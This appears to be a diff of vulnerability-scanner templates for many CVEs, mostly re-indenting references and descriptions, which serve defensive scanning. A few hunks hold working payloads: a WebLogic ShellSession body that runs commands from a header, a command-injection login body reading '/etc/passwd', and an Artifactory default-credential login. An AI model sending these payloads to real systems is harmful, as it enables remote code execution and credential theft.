POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
|
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Length: 60
|
Content-Length: 60
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
X-Requested-With: artUI
|
X-Requested-With: artUI
|
||||||
serial: 58
|
serial: 58
|
||||||
X-Forwarded-For: 127.0.0.1
|
X-Forwarded-For: 127.0.0.1
|
||||||
Request-Agent: artifactoryUI
|
Request-Agent: artifactoryUI
|
||||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
Origin: http://{{Hostname}}
|
Origin: http://{{Hostname}}
|
||||||
Referer: http://{{Hostname}}/artifactory/webapp/
|
Referer: http://{{Hostname}}/artifactory/webapp/
|
||||||
Accept-Language: en-US,en;q=0.9
|
Accept-Language: en-US,en;q=0.9
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
{"user":"access-admin","password":"password","type":"login"}
|
{"user":"access-admin","password":"password","type":"login"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: critical
|
severity: critical
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/46537
|
- https://www.exploit-db.com/exploits/46537
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: low
|
severity: low
|
||||||
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
|
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
|
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
|
||||||
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
|
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
|
||||||
tags: cve,cve2020,redirect
|
tags: cve,cve2020,redirect
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -5,9 +5,9 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
|
description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/pberba/CVE-2020-11978
|
- https://github.com/pberba/CVE-2020-11978
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11978
|
||||||
- https://twitter.com/wugeej/status/1400336603604668418
|
- https://twitter.com/wugeej/status/1400336603604668418
|
||||||
tags: cve,cve2020,apache,airflow,rce
|
tags: cve,cve2020,apache,airflow,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -10,16 +10,16 @@ info:
|
||||||
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
||||||
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
||||||
|
|
||||||
# This template exploits a Python code injection in the Netsweeper
|
# This template exploits a Python code injection in the Netsweeper
|
||||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||||
# prior, to execute code as the root user.
|
# prior, to execute code as the root user.
|
||||||
|
|
||||||
# Authentication is bypassed by sending a random whitelisted Referer
|
# Authentication is bypassed by sending a random whitelisted Referer
|
||||||
# header in each request.
|
# header in each request.
|
||||||
|
|
||||||
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
||||||
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
||||||
# been confirmed exploitable.
|
# been confirmed exploitable.
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
|
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
|
||||||
description: |
|
description: |
|
||||||
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
|
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
|
||||||
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
|
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
|
||||||
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
|
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
|
||||||
tags: cve,cve2020,wordpress
|
tags: cve,cve2020,wordpress
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,12 +5,12 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
|
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
|
||||||
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
|
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
|
||||||
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
|
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
|
||||||
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
|
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
|
||||||
Kylin's configuration information without any authentication,
|
Kylin's configuration information without any authentication,
|
||||||
so it is dangerous because some confidential information entries will be disclosed to everyone.
|
so it is dangerous because some confidential information entries will be disclosed to everyone.
|
||||||
reference:
|
reference:
|
||||||
- https://kylin.apache.org/docs/release_notes.html
|
- https://kylin.apache.org/docs/release_notes.html
|
||||||
- https://s.tencent.com/research/bsafe/1156.html
|
- https://s.tencent.com/research/bsafe/1156.html
|
||||||
|
|
|
@ -17,7 +17,7 @@ requests:
|
||||||
Test-Header: cat /etc/passwd
|
Test-Header: cat /etc/passwd
|
||||||
|
|
||||||
body: |
|
body: |
|
||||||
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
|
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
|
- https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
|
||||||
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
|
- https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
|
||||||
tags: cve,cve2020,rce,yii
|
tags: cve,cve2020,rce,yii
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,10 +6,10 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
|
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
|
||||||
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
|
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
|
||||||
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
|
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
|
||||||
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
|
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
|
||||||
tags: cve,cve2020,nette,rce
|
tags: cve,cve2020,nette,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -17,7 +17,7 @@ requests:
|
||||||
Referer: "{{Hostname}}/module/login/login.html"
|
Referer: "{{Hostname}}/module/login/login.html"
|
||||||
|
|
||||||
body: |
|
body: |
|
||||||
op=login&username=;`cat /etc/passwd`&password=
|
op=login&username=;`cat /etc/passwd`&password=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
|
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
|
||||||
tags: cve,cve2020,netgear,auth-bypass
|
tags: cve,cve2020,netgear,auth-bypass
|
||||||
reference:
|
reference:
|
||||||
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
|
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
|
||||||
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
|
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -5,9 +5,9 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
|
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
|
||||||
SVN, and GitLab credentials via the api/settings/values URI.
|
SVN, and GitLab credentials via the api/settings/values URI.
|
||||||
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
|
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
|
||||||
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
|
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
|
||||||
tags: cve,cve2020,sonarqube
|
tags: cve,cve2020,sonarqube
|
||||||
|
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: geeknik
|
author: geeknik
|
||||||
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/49314
|
- https://www.exploit-db.com/exploits/49314
|
||||||
- https://www.tenable.com/cve/CVE-2020-36112
|
- https://www.tenable.com/cve/CVE-2020-36112
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2020,sqli,cse
|
tags: cve,cve2020,sqli,cse
|
||||||
|
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
|
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
|
||||||
tags: cve,cve2020,jira,atlassian
|
tags: cve,cve2020,jira,atlassian
|
||||||
reference:
|
reference:
|
||||||
- https://twitter.com/ptswarm/status/1402644004781633540
|
- https://twitter.com/ptswarm/status/1402644004781633540
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: gy741
|
author: gy741
|
||||||
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
|
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
|
||||||
reference:
|
reference:
|
||||||
- https://cinzinga.com/CVE-2020-5307-5308/
|
- https://cinzinga.com/CVE-2020-5307-5308/
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2020,sqli
|
tags: cve,cve2020,sqli
|
||||||
|
|
||||||
|
|
|
@ -13,8 +13,8 @@ info:
|
||||||
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||||
- https://www.hpe.com/us/en/home.html # vendor homepage
|
- https://www.hpe.com/us/en/home.html # vendor homepage
|
||||||
|
|
||||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
tags: cve,cve2020,rce,liferay
|
tags: cve,cve2020,rce,liferay
|
||||||
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
|
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
|
||||||
reference:
|
reference:
|
||||||
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
|
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
|
||||||
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
|
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- payloads:
|
- payloads:
|
||||||
|
|
|
@ -7,10 +7,10 @@ info:
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
tags: cve,cve2020,apache,dos
|
tags: cve,cve2020,apache,dos
|
||||||
reference:
|
reference:
|
||||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||||
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
|
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
|
||||||
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
|
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: |
|
description: |
|
||||||
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
|
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
||||||
- https://www.tenable.com/security/research/tra-2021-13
|
- https://www.tenable.com/security/research/tra-2021-13
|
||||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||||
tags: cve,cve2021,lfi,buffalo,firmware,iot
|
tags: cve,cve2021,lfi,buffalo,firmware,iot
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: |
|
description: |
|
||||||
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
|
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
||||||
- https://www.tenable.com/security/research/tra-2021-13
|
- https://www.tenable.com/security/research/tra-2021-13
|
||||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||||
tags: cve,cve2021,buffalo,firmware,iot
|
tags: cve,cve2021,buffalo,firmware,iot
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: |
|
description: |
|
||||||
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
|
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
||||||
- https://www.tenable.com/security/research/tra-2021-13
|
- https://www.tenable.com/security/research/tra-2021-13
|
||||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||||
tags: cve,cve2021,buffalo,firmware,iot
|
tags: cve,cve2021,buffalo,firmware,iot
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
|
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
|
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
|
||||||
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
|
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
|
||||||
tags: cve,cve2021,rce,lucee,adobe
|
tags: cve,cve2021,rce,lucee,adobe
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
|
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||||
- https://docs.gitlab.com/ee/api/lint.html
|
- https://docs.gitlab.com/ee/api/lint.html
|
||||||
tags: cve,cve2021,gitlab,ssrf,oob
|
tags: cve,cve2021,gitlab,ssrf,oob
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
|
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
|
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
|
||||||
- https://wordpress.org/plugins/jh-404-logger/
|
- https://wordpress.org/plugins/jh-404-logger/
|
||||||
tags: cve,cve2021,wordpress,wp-plugin,xss
|
tags: cve,cve2021,wordpress,wp-plugin,xss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2021,realteo,xss,wordpress
|
tags: cve,cve2021,realteo,xss,wordpress
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
|
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
|
||||||
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
|
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
